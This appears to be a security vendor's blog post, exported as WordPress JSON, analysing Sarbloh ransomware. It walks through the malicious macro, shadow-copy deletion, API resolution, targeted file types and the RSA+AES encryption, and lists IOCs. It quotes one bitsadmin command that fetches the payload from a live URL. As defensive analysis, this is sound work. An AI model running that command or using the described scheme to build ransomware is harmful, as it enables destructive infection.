{"id":89654,"date":"2021-03-08T16:02:37","date_gmt":"2021-03-08T10:32:37","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=89654"},"modified":"2023-06-20T17:07:36","modified_gmt":"2023-06-20T11:37:36","slug":"activists-turn-hacktivists-new-ransomware-that-does-not-demand-money","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/activists-turn-hacktivists-new-ransomware-that-does-not-demand-money\/","title":{"rendered":"SARBLOH: A NEW RANSOMWARE THAT DOES NOT DEMAND MONEY"},"content":{"rendered":"

Quick Heal<\/a> Security Labs came across a Ransomware named \u201cSARBLOH RANSOMWARE\u201d, which claims to support the ongoing farmers protests in the country. In this attack, a malicious document is being spread which downloads ransomware from the following URLs –<\/p>\n

hxxps:\/\/s3.ap-south-1.amazonaws.com\/ans[.]video.input\/transcode_input\/profile16146815778005vw0qb.png<\/p>\n

hxxp:\/\/s3.ap-south-1.amazonaws.com\/ans[.]video.input\/transcode_input\/profile16146815778005vw0qb.png<\/p>\n

The downloaded ransomware encrypts the files on the system with extension .sarbloh and shows the ransom note. This is an unusual scenario where the attacker does not ask for any monetary ransom but demands justice for the farmer instead.<\/p>\n

\"Fig
Fig 1: Ransom note<\/figcaption><\/figure>\n

Document Analysis<\/h2>\n

The office Document attachment contains a macro with a heavily obfuscated VBA code. This code is responsible to deliver payload in the attack chain.<\/p>\n

\"Fig
Fig 2: Malicious Document<\/figcaption><\/figure>\n

 <\/p>\n

\"Fig
Fig 3: Malicious VBA macro<\/figcaption><\/figure>\n

After debugging the macro, we can see that there is a call to bitsadmin assigned to a variable that contains a link to download the file and the location where it is to be downloaded.
\nThe command is as follows:<\/p>\n

“bitsadmin \/transfer myDownloadJOb23 https:\/\/s3.ap-south-1.amazonaws.com\/ans.video.input\/transcode_input\/profile16146815778005vw0qb.png C:\\Users\\admin\\Documents\\\\putty.exe”<\/strong><\/p>\n

The file is downloaded in User Documents named putty.exe which is our final payload.<\/p>\n

\"
Fig 4: Macro Variables<\/figcaption><\/figure>\n

There is a command in the VBA macro to delete the shadow copies. This can be observed in the below snippet (Command has been highlighted in yellow)<\/p>\n

\"Fig
Fig 5: Shadow copies Delete<\/figcaption><\/figure>\n

Payload Analysis<\/h2>\n

The downloaded payload is only 21 kb in size. The attacker names it putty.exe to appear as a legit one. Examining the contents of the file, it has been observed that the file has no import directory. It looks like the case where APIs are dynamically resolved. There are hex values present in the data section which undergoes RC4 decryption where the key is \u201cFUCKINDIA<\/strong>\u201d. RC4 logic has been implemented statically. This results in various APIs which are dynamically loaded.<\/p>\n

\"Fig
Fig 6: Hex streams present in the Data section<\/figcaption><\/figure>\n

The hex stream highlighted above when decrypted gives LdrLoadDll which can be observed in the following figure.<\/p>\n

\"Fig
Fig 7: Decrypted data<\/figcaption><\/figure>\n

The below figure shows calls to the payload.0x1F000(RC4 decrypt) where the hex stream is passed as a parameter and then call to payload.0x1F2270 which resolves and loads the API. Subsequently by LdrLoadDll and LdrGetProcedureAddress all the DLLs and APIs are loaded.<\/p>\n

\"Fig
Fig 8: Dynamic resolution of APIs<\/figcaption><\/figure>\n

The payload creates two threads, the first one for encryption of files and the second one for displaying ransom-note<\/p>\n

\"Fig
Fig 9: Creates Threads<\/figcaption><\/figure>\n

Let us now discuss the thread to encrypt data. To enumerate through each file in a directory API \u201cZwQueryDirectoryFile\u201d \u00a0\u00a0<\/strong>has been used. After obtaining the filename along with the extension there is a code to check if it is of the below extensions. This ransomware only encrypts the following extensions.<\/p>\n

.txt.dat.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std<\/em><\/p>\n

.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs<\/em><\/p>\n

.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv<\/em><\/p>\n

.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif<\/em><\/p>\n

.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti<\/em><\/p>\n

.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm<\/em><\/p>\n

.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.doc<\/em><\/p>\n

These extensions are present in .rdata section:<\/p>\n

\"Fig
Fig 10: Extensions for encryption<\/figcaption><\/figure>\n

The following figure indicates the code to check if the obtained extension is the same as the above extensions. In this figure, it can be seen that \u201chiberfil.sys\u201d system files extension .sys is being compared with .dat<\/p>\n

\"Fig
Fig 11: File Extension Comparison<\/figcaption><\/figure>\n

File Encryption<\/h2>\n

This ransomware uses a combination of RSA+AES encryption. The files are encrypted by AES-128 CBC mode with a randomly generated key unique to each file. Then the AES KEY is encrypted by RSA. Let us look into this in detail.<\/p>\n

The RSA public key is stored in a base-64 format in the .rdata section. A call is made to API \u201cCryptAcquirecontext<\/strong>\u201d to obtain the handle for the current user within CSP \u201cMicrosoft Enhanced Cryptographic Provider v1.0\u201d. This API is called twice to obtain handles for RSA and AES respectively.<\/p>\n

\"Fig
Fig 12: Base 64 encoded RSA Public key<\/figcaption><\/figure>\n

Then a set of APIs are called as follows
\n1. CryptStringToBinaryW<\/strong>: To decode the base 64 encoded RSA public key shown in the figure above to binary form
\n2. CryptDecodeObjectEx<\/strong>: To decrypt the obtained binary data and obtain it in the form of the CERT_PUBLIC_KEY_INFO structure. This structure contains the
\nAlgorithm szOID_RSA_RSA >><\/strong>“1.2.840.113549.1.1.1” and the key<\/p>\n

3. CryptImportPublicKeyInfo<\/strong>: To import the above-decoded structure from key blob to CSP.<\/p>\n

\"Fig
Fig 13: CERT_PUBLIC_KEY_INFO structure generation<\/figcaption><\/figure>\n

Now by API CryptGenKey<\/strong> with ALGID: 660E which denotes CALG_AES_128<\/strong> a random key is generated and the handle to the key is obtained. The file\u2019s data is now encrypted by API CryptEncrypt. <\/strong>Later the key is exported from CSP to the key blob in the files\u2019 memory space by API CryptExportKey <\/strong>and then encrypted by RSA Public key. <\/strong>The following code snippet shows the APIs and the dump shows the exported key.<\/p>\n

\"Fig
Fig 14: AES key export and Encryption by RSA<\/figcaption><\/figure>\n

The encrypted data along with encrypted AES key, length of the original file, and length of the key are written into the encrypted file and later on the AES key is destroyed by CryptDestroyKey. <\/strong>The encrypted file content can be seen below:<\/p>\n

\"Fig
Fig 15: Encrypted file content<\/figcaption><\/figure>\n

The following snippet shows few encrypted files with extension .sarbloh.<\/p>\n

\"Fig
Fig 16: Encrypted files<\/figcaption><\/figure>\n

The second thread uses APIs such as CreateWindow, ShowWindow to create a window where the ransom note is displayed. The APIs GetMessage, TranslateMessage and DisplayMessage are used to fetch the note from .rdata and display it in the window created.<\/p>\n

Conclusion<\/h2>\n

Sarbloh Ransomware encrypted files cannot be decrypted since a pair of Symmetric + Asymmetric combination has been used. The encryption can be summarized as follows:
\n1. RSA Public key which is embedded in the file itself is imported to CSP.
\n2. Generates random AES key
\n3. Encrypts files using the newly generated AES key.
\n4. Encrypts the AES key with RSA public key
\n5. Appends the encrypted AES key within the encrypted file.<\/p>\n

The most important thing here is that the public key was present in the file itself which means that RSA keys were not generated dynamically, so only the attacker has access to the decryption key. In most ransomware cases the attacker usually asks for a monetary ransom to receive a decryptor. This is an unusual case where the attackers mention that there is no chance of recovery of files until the demands of farmers have been met. The ransom note mentions that this attack is by Khalsa Cyber Fauj<\/strong> and gives a warning to the victim that his fate will be very devastating if laws are not repealed. Such kind of cyber protests have skyrocketed in popularity and have become commonplace in today’s modern world. To keep ourselves secured from such kind of attacks follow the great saying\u00a0 \u201cPrevention is better than Cure\u201d!<\/p>\n

The infection vector is usually in the form of mails, so do not open attachments from an untrusted sender. Do not enable macros in the Doc received mainly from mails. Avoid clicking on unverified links and those in spam email. Keep your software and antivirus updated. Always remember to back-up your data so that you can recover it even in case of a ransomware attack.<\/p>\n

How Quick Heal protects its users from the Sarbloh Ransomware?
\n<\/strong><\/h2>\n
\"Fig
Fig 17: Behavioural detection<\/figcaption><\/figure>\n

 <\/p>\n

\"Fig
Fig 18: ARW Protection<\/figcaption><\/figure>\n

Malware Protection<\/strong><\/p>\n

OLE.Downloader.41299 >> Document File
\nTroj.Ransom.19047449>> Executable file<\/p>\n

IOCs:<\/p>\n

b8756966cf478aa401a067f14eefb57f34eea127348973350b14b5b53e3eec4f (DOC file
\nacbe95f70f7d8e20781841cfd859d78575ccd36720c68b60789251a509e1194d(EXE)<\/em><\/strong><\/p>\n

 <\/p>\n

 <\/p>\n","protected":false},"excerpt":{"rendered":"

Quick Heal Security Labs came across a Ransomware named \u201cSARBLOH RANSOMWARE\u201d, which claims to support the ongoing farmers protests in the country. In this attack, a malicious document is being spread which downloads ransomware from the following URLs – hxxps:\/\/s3.ap-south-1.amazonaws.com\/ans[.]video.input\/transcode_input\/profile16146815778005vw0qb.png hxxp:\/\/s3.ap-south-1.amazonaws.com\/ans[.]video.input\/transcode_input\/profile16146815778005vw0qb.png The downloaded ransomware encrypts the files on the system with extension .sarbloh and shows […]<\/p>\n","protected":false},"author":85,"featured_media":89678,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[910],"tags":[1783,50,1782],"class_list":["post-89654","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ransomware","tag-indian-farmer-protest","tag-ransomware","tag-sarbloh"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89654"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/85"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=89654"}],"version-history":[{"count":10,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89654\/revisions"}],"predecessor-version":[{"id":91519,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89654\/revisions\/91519"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/89678"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=89654"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=89654"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=89654"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}